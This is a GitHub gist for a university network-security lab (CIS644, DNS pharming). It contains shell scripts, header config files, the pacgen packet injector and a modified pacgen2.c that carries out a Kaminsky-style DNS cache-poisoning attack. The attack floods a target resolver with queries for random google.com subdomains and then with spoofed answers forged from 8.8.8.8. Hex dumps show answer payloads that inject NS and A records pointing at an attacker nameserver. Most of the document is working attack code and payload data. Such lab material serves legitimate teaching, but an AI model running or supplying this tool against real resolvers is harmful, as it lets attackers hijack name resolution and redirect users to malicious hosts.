Skip to content

Instantly share code, notes, and snippets.

@ql-owo-lp

ql-owo-lp/dns_attack_advanced.sh

Last active December 15, 2015 02:39
Show Gist options
  • Save ql-owo-lp/5188753 to your computer and use it in GitHub Desktop.
Save ql-owo-lp/5188753 to your computer and use it in GitHub Desktop.
Download ZIP
CIS644 Lab 4 DNS Pharming
Raw
dns_attack_advanced.sh
#!/bin/sh
# script created for CIS644 Lab 4, Kevin - Mar 18, 2013
# the payload_answer2 is a special raw data file that carefully constructured
# to use this file, you should insert two byte as Transaction ID at position 0 of the file
# then read 11 bytes, insert your random domain name at position 13(2+11)
# then append the fake DNS server IP address in the end of the file
./pacgen2
Raw
dns_attack_simple.sh
#!/bin/sh
# uncomment the one you want to run
# send fake dns query
#./pacgen -p payload_query -t udp_header_query -i ip_header_query -e eth_header_query
# send fake dns response
# ./pacgen -p payload_answer -t udp_header_answer -i ip_header_answer -e eth_header_answer
Raw
eth_header_answer
saddr, 00, 00, 00, 00, 00, 01
daddr, 00, 00, 00, 00, 01, 22
proto, ip
pktcount, 1
Raw
eth_header_query
saddr, 00, 00, 00, 00, 01, 23
daddr, 00, 00, 00, 00, 01, 22
proto, ip
pktcount, 1
Raw
install.sh
#!/bin/bash
echo ' GNU GENERAL PUBLIC LICENSE'
echo ' Version 2, June 1991'
echo
echo ' Copyright (C) 1989, 1991 Free Software Foundation, Inc.,'
echo ' 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA'
echo ' Everyone is permitted to copy and distribute verbatim copies'
echo ' of this license document, but changing it is not allowed.'
echo
echo 'Compiling pacgen.c version 1.10 to binary pacgen using gcc'
gcc `libnet-config --cflags --defines` pacgen.c -o pacgen `libnet-config --libs`
Raw
install2.sh
#!/bin/bash
echo ' GNU GENERAL PUBLIC LICENSE'
echo ' Version 2, June 1991'
echo
echo ' Copyright (C) 1989, 1991 Free Software Foundation, Inc.,'
echo ' 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA'
echo ' Everyone is permitted to copy and distribute verbatim copies'
echo ' of this license document, but changing it is not allowed.'
echo
echo 'Compiling pacgen.c version 1.10 to binary pacgen using gcc'
gcc `libnet-config --cflags --defines` pacgen2.c -o pacgen2 `libnet-config --libs`
Raw
ip_header_answer
id, 33333
frag, 0
ttl, 123
saddr, 8.8.8.8
daddr, 192.168.0.10
proto, udp
interval, 0
tos,iptos_lowdelay | iptos_throughput | iptos_reliability | iptos_mincost!
Raw
ip_header_query
id, 33333
frag, 0
ttl, 123
saddr, 192.168.0.100
daddr, 192.168.0.10
proto, udp
interval, 0
tos,iptos_lowdelay | iptos_throughput | iptos_reliability | iptos_mincost!
Raw
pacgen.c
/* GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
*/
#include <libnet.h>
#include <unistd.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
int c;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char errbuf[LIBNET_ERRBUF_SIZE];
char eth_file[FILENAME_MAX] = "";
char ip_file[FILENAME_MAX] = "";
char tcp_file[FILENAME_MAX] = "";
char payload_file[FILENAME_MAX] = "";
char *payload_location;
int x;
int y = 0;
int udp_src_port = 1; /* UDP source port */
int udp_des_port = 1; /* UDP dest port */
int z;
int i;
int payload_filesize = 0;
u_short t_src_port; /* TCP source port */
u_short t_des_port; /* TCP dest port */
u_long t_win; /* TCP window size */
u_short t_urgent; /* TCP urgent data pointer */
u_short i_id; /* IP id */
u_short i_frag; /* IP frag */
u_short head_type; /* TCP or UDP */
u_long t_ack; /* TCP ack number */
u_long t_seq; /* TCP sequence number */
u_long i_des_addr; /* IP dest addr */
u_long i_src_addr; /* IP source addr */
u_char i_ttos[90]; /* IP TOS string */
u_char t_control[65]; /* TCP control string */
u_char eth_saddr[6]; /* NULL Ethernet saddr */
u_char eth_daddr[6]; /* NULL Ethernet daddr */
u_char eth_proto[60]; /* Ethernet protocal */
u_long eth_pktcount; /* How many packets to send */
long nap_time; /* How long to sleep */
u_char ip_proto[40];
u_char spa[4]={0x0, 0x0, 0x0, 0x0};
u_char tpa[4]={0x0, 0x0, 0x0, 0x0};
u_char *device = NULL;
u_char i_ttos_val = 0; /* final or'd value for ip tos */
u_char t_control_val = 0; /* final or'd value for tcp control */
u_char i_ttl; /* IP TTL */
u_short e_proto_val = 0; /* final resulting value for eth_proto */
u_short ip_proto_val = 0; /* final resulting value for ip_proto */
int
main(int argc, char *argv[])
{
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
/* NULL, */ /* network interface eth0, eth1, etc. NULL is default.*/
"eth5", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
/* src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
*/
while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF)
{
switch (c)
{
case 'p':
strcpy(payload_file, optarg);
break;
case 't':
strcpy(tcp_file, optarg);
break;
case 'i':
strcpy(ip_file, optarg);
break;
case 'e':
strcpy(eth_file, optarg);
break;
default:
break;
}
}
if (optind != 9)
{
usage();
exit(0);
}
load_payload();
load_ethernet();
load_tcp_udp();
load_ip();
convert_proto();
/* Testing tcp header options
t = libnet_build_tcp_options(
"\003\003\012\001\002\004\001\011\010\012\077\077\077\077\000\000\000\000\000\000",
20,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build TCP options: %s\n", libnet_geterror(l));
goto bad;
}
*/
if(ip_proto_val==IPPROTO_TCP){
t = libnet_build_tcp(
t_src_port, /* source port */
t_des_port, /* destination port */
t_seq, /* sequence number */
t_ack, /* acknowledgement num */
t_control_val, /* control flags */
t_win, /* window size */
0, /* checksum */
t_urgent, /* urgent pointer */
LIBNET_TCP_H + payload_filesize, /* TCP packet size */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_TCP_H;
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
}
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_src_port, /* source port */
t_des_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_src_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
if (nap_time >= 0)
printf("You have chosen to send %d packets every %d seconds. \nYou will need to press CTRL-C to halt this process.\n", eth_pktcount, nap_time);
if (nap_time == -1)
printf("You have chose to send %d packets and quit.\n",eth_pktcount);
for(z=0;y<100;z++) /* setup fake loop to begin infinit loop. This is on purpose because I'm a moron. :-) */
{
for(x=0;x < eth_pktcount;x++) /* Nested packet count loop */
{
c = libnet_write(l);
}
if (nap_time == -1){
y=999;
nap_time = 0;
}
sleep(nap_time); /*Pause of this many seconds then loop again*/
z=1;
}
printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */
/* give the buf memory back */
libnet_destroy(l);
return (0);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
usage()
{
fprintf(stderr, "pacgen 1.10 by Bo Cato. Protected under GPL.\nusage: pacgen -p <payload file> -t <TCP/UDP file> -i <IP file> -e <Ethernet file>\n");
}
/* load_payload: load the payload into memory */
load_payload()
{
FILE *infile;
struct stat statbuf;
int i = 0;
int c = 0;
/* get the file size so we can figure out how much memory to allocate */
stat(payload_file, &statbuf);
payload_filesize = statbuf.st_size;
payload_location = (char *)malloc(payload_filesize * sizeof(char));
if (payload_location == 0)
{
printf("Allocation of memory for payload failed.\n");
exit(0);
}
/* open the file and read it into memory */
infile = fopen(payload_file, "r"); /* open the payload file read only */
while((c = getc(infile)) != EOF)
{
*(payload_location + i) = c;
i++;
}
fclose(infile);
}
/* load_ethernet: load ethernet data file into the variables */
load_ethernet()
{
FILE *infile;
char s_read[40];
char d_read[40];
char p_read[60];
char count_line[40];
infile = fopen(eth_file, "r");
fgets(s_read, 40, infile); /*read the source mac*/
fgets(d_read, 40, infile); /*read the destination mac*/
fgets(p_read, 60, infile); /*read the desired protocal*/
fgets(count_line, 40, infile); /*read how many packets to send*/
sscanf(s_read, "saddr,%x, %x, %x, %x, %x, %x", &eth_saddr[0], &eth_saddr[1], &eth_saddr[2], &eth_saddr[3], &eth_saddr[4], &eth_saddr[5]);
sscanf(d_read, "daddr,%x, %x, %x, %x, %x, %x", &eth_daddr[0], &eth_daddr[1], &eth_daddr[2], &eth_daddr[3], &eth_daddr[4], &eth_daddr[5]);
sscanf(p_read, "proto,%s", &eth_proto);
sscanf(count_line, "pktcount,%d", &eth_pktcount);
fclose(infile);
}
/* load_tcp_udp: load TCP or UDP data file into the variables */
load_tcp_udp()
{
FILE *infile;
char sport_line[20] = "";
char dport_line[20] = "";
char seq_line[20] = "";
char ack_line[20] = "";
char control_line[65] = "";
char win_line[20] = "";
char urg_line[20] = "";
infile = fopen(tcp_file, "r");
fgets(sport_line, 15, infile); /*read the source port*/
fgets(dport_line, 15, infile); /*read the dest port*/
fgets(win_line, 12, infile); /*read the win num*/
fgets(urg_line, 12, infile); /*read the urg id*/
fgets(seq_line, 13, infile); /*read the seq num*/
fgets(ack_line, 13, infile); /*read the ack id*/
fgets(control_line, 63, infile); /*read the control flags*/
/* parse the strings and throw the values into the variable */
sscanf(sport_line, "sport,%d", &t_src_port);
sscanf(sport_line, "sport,%d", &udp_src_port);
sscanf(dport_line, "dport,%d", &t_des_port);
sscanf(dport_line, "dport,%d", &udp_des_port);
sscanf(win_line, "win,%d", &t_win);
sscanf(urg_line, "urg,%d", &t_urgent);
sscanf(seq_line, "seq,%ld", &t_seq);
sscanf(ack_line, "ack,%ld", &t_ack);
sscanf(control_line, "control,%[^!]", &t_control);
fclose(infile); /*close the file*/
}
/* load_ip: load IP data file into memory */
load_ip()
{
FILE *infile;
char proto_line[40] = "";
char id_line[40] = "";
char frag_line[40] = "";
char ttl_line[40] = "";
char saddr_line[40] = "";
char daddr_line[40] = "";
char tos_line[90] = "";
char z_zsaddr[40] = "";
char z_zdaddr[40] = "";
char inter_line[15]="";
infile = fopen(ip_file, "r");
fgets(id_line, 11, infile); /* this stuff should be obvious if you read the above subroutine */
fgets(frag_line, 13, infile); /* see RFC 791 for details */
fgets(ttl_line, 10, infile);
fgets(saddr_line, 24, infile);
fgets(daddr_line, 24, infile);
fgets(proto_line, 40, infile);
fgets(inter_line, 15, infile);
fgets(tos_line, 78, infile);
sscanf(id_line, "id,%d", &i_id);
sscanf(frag_line, "frag,%d", &i_frag);
sscanf(ttl_line, "ttl,%d", &i_ttl);
sscanf(saddr_line, "saddr,%s", &z_zsaddr);
sscanf(daddr_line, "daddr,%s", &z_zdaddr);
sscanf(proto_line, "proto,%s", &ip_proto);
sscanf(inter_line, "interval,%d", &nap_time);
sscanf(tos_line, "tos,%[^!]", &i_ttos);
i_src_addr = libnet_name2addr4(l, z_zsaddr, LIBNET_RESOLVE);
i_des_addr = libnet_name2addr4(l, z_zdaddr, LIBNET_RESOLVE);
fclose(infile);
}
convert_proto()
{
/* Need to add more Ethernet and IP protocals to choose from */
if(strstr(eth_proto, "arp") != NULL)
e_proto_val = e_proto_val | ETHERTYPE_ARP;
if(strstr(eth_proto, "ip") != NULL)
e_proto_val = e_proto_val | ETHERTYPE_IP;
if(strstr(ip_proto, "tcp") != NULL)
ip_proto_val = ip_proto_val | IPPROTO_TCP;
if(strstr(ip_proto, "udp") != NULL)
ip_proto_val = ip_proto_val | IPPROTO_UDP;
}
/* convert_toscontrol: or flags in strings to make u_chars */
convert_toscontrol()
{
if(strstr(t_control, "th_urg") != NULL)
t_control_val = t_control_val | TH_URG;
if(strstr(t_control, "th_ack") != NULL)
t_control_val = t_control_val | TH_ACK;
if(strstr(t_control, "th_psh") != NULL)
t_control_val = t_control_val | TH_PUSH;
if(strstr(t_control, "th_rst") != NULL)
t_control_val = t_control_val | TH_RST;
if(strstr(t_control, "th_syn") != NULL)
t_control_val = t_control_val | TH_SYN;
if(strstr(t_control, "th_fin") != NULL)
t_control_val = t_control_val | TH_FIN;
if(strstr(i_ttos, "iptos_lowdelay") != NULL)
i_ttos_val = i_ttos_val | IPTOS_LOWDELAY;
if(strstr(i_ttos, "iptos_throughput") != NULL)
i_ttos_val = i_ttos_val | IPTOS_THROUGHPUT;
if(strstr(i_ttos, "iptos_reliability") != NULL)
i_ttos_val = i_ttos_val | IPTOS_RELIABILITY;
if(strstr(i_ttos, "iptos_mincost") != NULL)
i_ttos_val = i_ttos_val | IPTOS_MINCOST;
}
/* EOF */
Raw
pacgen2.c
/* GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
*/
#include <libnet.h>
#include <unistd.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
int c;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char errbuf[LIBNET_ERRBUF_SIZE];
char payload_file[FILENAME_MAX] = "";
char attack_domain[] = "google.com"; // target domain
//char attack_dns[] = "cis644-dns-attack.google.com"; // fake nameserver
//char attack_dns_ip[40] = "192.168.0.200"; // attacker's DNS server ip address
char target_dns_ip[] = "192.168.0.10"; // target dns server which is going to be attacked
char client_ip[] = "192.168.0.100"; // client dns ip, with which we will sends DNS query
char real_dns_server[] = "8.8.8.8"; // real DNS server IP
char dev[] = "eth5";
//u_long i_attack_dns_ip;
u_long i_target_dns_ip;
u_long i_client_ip;
u_long i_real_dns_server;
char subdomain_host[50];
char *payload_location;
int x;
int y = 0;
int udp_src_port = 1; /* UDP source port */
int udp_des_port = 1; /* UDP dest port */
int z;
int i;
int payload_filesize = 0;
u_char eth_saddr[6]; /* NULL Ethernet saddr */
u_char eth_daddr[6]; /* NULL Ethernet daddr */
u_char eth_caddr[6]; /* NULL Ethernet daddr */
u_char eth_proto[60]; /* Ethernet protocal */
u_long eth_pktcount; /* How many packets to send */
long nap_time; /* How long to sleep */
u_char ip_proto[40];
u_char spa[4]={0x0, 0x0, 0x0, 0x0};
u_char tpa[4]={0x0, 0x0, 0x0, 0x0};
u_char *device = NULL;
u_char i_ttos_val = 0; /* final or'd value for ip tos */
u_char i_ttl; /* IP TTL */
u_short e_proto_val = 0; /* final resulting value for eth_proto */
u_short ip_proto_val = 0; /* final resulting value for ip_proto */
int
main(int argc, char *argv[])
{
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
dev, /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
// get attacker's dns server ip
//i_attack_dns_ip = libnet_name2addr4(l, attack_dns_ip, LIBNET_RESOLVE);
i_target_dns_ip = libnet_name2addr4(l, target_dns_ip, LIBNET_RESOLVE);
i_client_ip = libnet_name2addr4(l, client_ip, LIBNET_RESOLVE);
i_real_dns_server = libnet_name2addr4(l, real_dns_server, LIBNET_RESOLVE);
// server mac
sscanf("00, 00, 00, 00, 01, 22", "%x, %x, %x, %x, %x, %x", &eth_saddr[0], &eth_saddr[1], &eth_saddr[2], &eth_saddr[3], &eth_saddr[4], &eth_saddr[5]);
// gateway mac
sscanf("00, 00, 00, 00, 00, 01", "%x, %x, %x, %x, %x, %x", &eth_daddr[0], &eth_daddr[1], &eth_daddr[2], &eth_daddr[3], &eth_daddr[4], &eth_daddr[5]);
// client mac
sscanf("00, 00, 00, 00, 01, 23", "%x, %x, %x, %x, %x, %x", &eth_caddr[0], &eth_caddr[1], &eth_caddr[2], &eth_caddr[3], &eth_caddr[4], &eth_caddr[5]);
srand((int)time(0)); // init random seed
while (1==1) /* setup fake loop to begin infinit loop. This is on purpose because I'm a moron. :-) */
{
// first generate a random domain
// note the first dot
int randomNumber = (rand()%10000000);
while (randomNumber<1000000) randomNumber*=10;
sprintf(subdomain_host, ".x-%d.%s", randomNumber,attack_domain);
printf("\nNow attacking with domain %s \n",subdomain_host);
convertDomain();
// query attack ----------------------------------------------------------------------------------
load_payload_query();
// always builds UDP
t = libnet_build_udp(
33333, /* source port */
53, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_filesize, /* length */
0, /* TOS */
12345, /* IP ID */
IP_DF, /* IP Frag */
255, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
i_client_ip, /* source IP */
i_target_dns_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_saddr, /* ethernet destination */
eth_caddr, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
free(payload_location);
libnet_destroy(l);
for (i=0;i<30;i++) { // send 100 fake response, as the server response quite fast
l = libnet_init(
LIBNET_LINK, /* injection type */
dev, /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
load_payload_answer();
// always builds UDP
t = libnet_build_udp(
53, /* source port */
33333, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_filesize, /* length */
0, /* TOS */
12345, /* IP ID */
IP_DF, /* IP Frag */
255, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
i_real_dns_server, /* source IP */
i_target_dns_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_saddr, /* ethernet destination */
eth_daddr, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
free(payload_location);
libnet_destroy(l);
}
l = libnet_init(
LIBNET_LINK, /* injection type */
dev, /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
// end ---------------------------------------------------------------
}
printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */
/* give the buf memory back */
libnet_destroy(l);
return (0);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
convertDomain() {
unsigned int len = (unsigned)strlen(subdomain_host);
int i=0;
while (len>0) {
if (subdomain_host[len-1]=='.') {
subdomain_host[len-1]=i;
i=0;
}
else {
i++;
}
len--;
}
}
/* load_payload: load the payload into memory */
load_payload_query()
{
FILE *infile;
struct stat statbuf;
int i = 0;
int j = 0;
int c = 0;
unsigned int len = (unsigned)strlen(subdomain_host);
char payload_file[] = "payload_query2";
stat(payload_file, &statbuf);
payload_filesize = statbuf.st_size+len;
payload_location = (char *)malloc(payload_filesize * sizeof(char));
if (payload_location == 0)
{
printf("Allocation of memory for payload failed.\n");
exit(0);
}
/* open the file and read it into memory */
infile = fopen(payload_file, "r"); /* open the payload file read only */
while((c = getc(infile)) != EOF)
{
if (i==12) {
for (j=0;j<len;j++) {
*(payload_location + i + j) = subdomain_host[j];
}
i+=len;
}
*(payload_location + i) = c;
i++;
}
fclose(infile);
}
/* load_payload: load the payload into memory */
load_payload_answer()
{
FILE *infile;
struct stat statbuf;
int i = 2;
int j = 0;
int c = 0;
unsigned int len = (unsigned)strlen(subdomain_host);
char payload_file[] = "payload_answer3";
//char payload_file[] = "payload_answer2";
// generate random transaction ID
int transID[] = {rand()%256,rand()%256};
stat(payload_file, &statbuf);
payload_filesize = statbuf.st_size+len+2;
payload_location = (char *)malloc(payload_filesize * sizeof(char));
if (payload_location == 0)
{
printf("Allocation of memory for payload failed.\n");
exit(0);
}
*payload_location = transID[0];
*(payload_location+1) = transID[1];
/* open the file and read it into memory */
infile = fopen(payload_file, "r"); /* open the payload file read only */
while((c = getc(infile)) != EOF)
{
if (i==12) {
for (j=0;j<len;j++) {
*(payload_location + i + j) = subdomain_host[j];
}
i+=len;
}
*(payload_location + i) = c;
i++;
}
fclose(infile);
}
/* EOF */
Raw
payload_answer.html
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="hexdata" CONTENT="GHex export to HTML">
</HEAD>
<BODY>
<TABLE BORDER="0" CELLSPACING="0" WIDTH="100%">
<TR>
<TD WIDTH="33%">
&nbsp;
</TD>
<TD WIDTH="33%" ALIGN="CENTER">
payload_answer:
</TD>
<TD WIDTH="33%" ALIGN="RIGHT">
&nbsp;
</TD>
</TR>
</TABLE>
<CENTER>
<TABLE BORDER="1" CELLSPACING="2" CELLPADDING="2">
<TR>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>00000000</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000011</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000022</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000033</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000044</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000055</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000066</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000077</PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>27 a6 85 80 00 01 00 01 00 01 00 01 03 78 78 78 06</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00 01 c0 0c</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 01 00 01 00 00 0e 10 00 04 01 02 03 04 11 63 69</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>73 36 34 34 2d 63 6e 73 2d 61 74 74 61 63 6b c0 10</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 02 00 01 00 00 0e 10 00 14 11 63 69 73 36 34 2d</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>64 6e 73 2d 61 74 74 61 63 6b c0 10 11 63 69 73 36</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>34 34 2d 64 6e 73 2d 61 74 74 61 63 6b c0 10 00 01</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 01 00 00 0e 10 00 04 c0 a8 00 c8 </PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>'............xxx.</PRE></TD>
</TR>
<TR>
<TD>
<PRE>google.com.......</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...............ci</PRE></TD>
</TR>
<TR>
<TD>
<PRE>s644-cns-attack..</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...........cis64-</PRE></TD>
</TR>
<TR>
<TD>
<PRE>dns-attack...cis6</PRE></TD>
</TR>
<TR>
<TD>
<PRE>44-dns-attack....</PRE></TD>
</TR>
<TR>
<TD>
<PRE>............</PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
<TR>
<TD>
<PRE></PRE></TD>
</TR>
</TD>
</TR>
</TABLE>
</TABLE>
</CENTER>
<HR WIDTH="100%">Hex dump generated by <B>gtkhex-1.0</B>
</BODY>
</HTML>
Raw
payload_answer2.html
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="hexdata" CONTENT="GHex export to HTML">
</HEAD>
<BODY>
<TABLE BORDER="0" CELLSPACING="0" WIDTH="100%">
<TR>
<TD WIDTH="33%">
&nbsp;
</TD>
<TD WIDTH="33%" ALIGN="CENTER">
payload_answer2:
</TD>
<TD WIDTH="33%" ALIGN="RIGHT">
&nbsp;
</TD>
</TR>
</TABLE>
<CENTER>
<TABLE BORDER="1" CELLSPACING="2" CELLPADDING="2">
<TR>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>00000000</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000011</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000022</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000033</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000044</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000055</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00000066</PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>85 80 00 01 00 01 00 01 00 01 00 00 01 00 01 c0 0c</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 01 00 01 00 00 0e 10 00 04 01 02 03 04 11 63 69</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>73 36 34 34 2d 64 6e 73 2d 61 74 74 61 63 6b c0 16</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>00 02 00 01 00 00 0e 10 00 14 11 63 69 73 36 34 34</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>2d 64 6e 73 2d 61 74 74 61 63 6b c0 16 11 63 69 73</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>36 34 34 2d 64 6e 73 2d 61 74 74 61 63 6b c0 16 00</PRE>
</TD>
</TR>
<TR>
<TD>
<PRE>01 00 01 00 00 0e 10 00 04 c0 a8 00 c8 </PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
<TR>
<TD>
<PRE></PRE>
</TD>
</TR>
</TABLE>
</TD>
<TD>
<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD>
<PRE>.................</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...............ci</PRE></TD>
</TR>
<TR>
<TD>
<PRE>s644-dns-attack..</PRE></TD>
</TR>
<TR>
<TD>
<PRE>...........cis644</PRE></TD>
</TR>
<TR>
